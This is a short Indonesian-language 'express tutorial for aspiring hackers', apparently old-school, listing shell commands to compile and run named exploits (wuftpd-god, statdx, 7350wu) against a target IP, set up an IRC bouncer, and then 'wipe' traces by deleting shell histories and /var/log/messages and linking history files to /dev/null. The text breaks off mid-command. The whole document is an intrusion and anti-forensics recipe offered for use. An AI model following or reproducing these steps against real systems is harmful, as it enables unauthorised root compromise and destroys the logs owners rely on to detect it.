Tutorial Ekspres Buat Calon Hacker
Title : Tutorial Express buat calon Hacker
Author : Andr3^81
1. ***Compile File***
gcc -o file file.c
2. ***Jalanin wuftpd-god.c***
./filewuftpd-god -t IPtarget -s0
3. ***Jalanin statdx.c ***
./filestatdx -t IPtarget -d0
4. ***Jalanin 7350wu***
./7350wu -r -h IPtarget
5. ***Compile BnC : (BnC2.2.4)***
gcc -o file bnc.c
export TERM=vt100 (2x)
pico bnc.conf
./file
6. ***Root Wipe***
cd /
rm -f /.bash_history /root/.bash_history /var/log/messages
ln -s /dev/null /.bash_history
ln -s /dev/null /root/.bash_history
touch /var/log/messages
chmod [...]
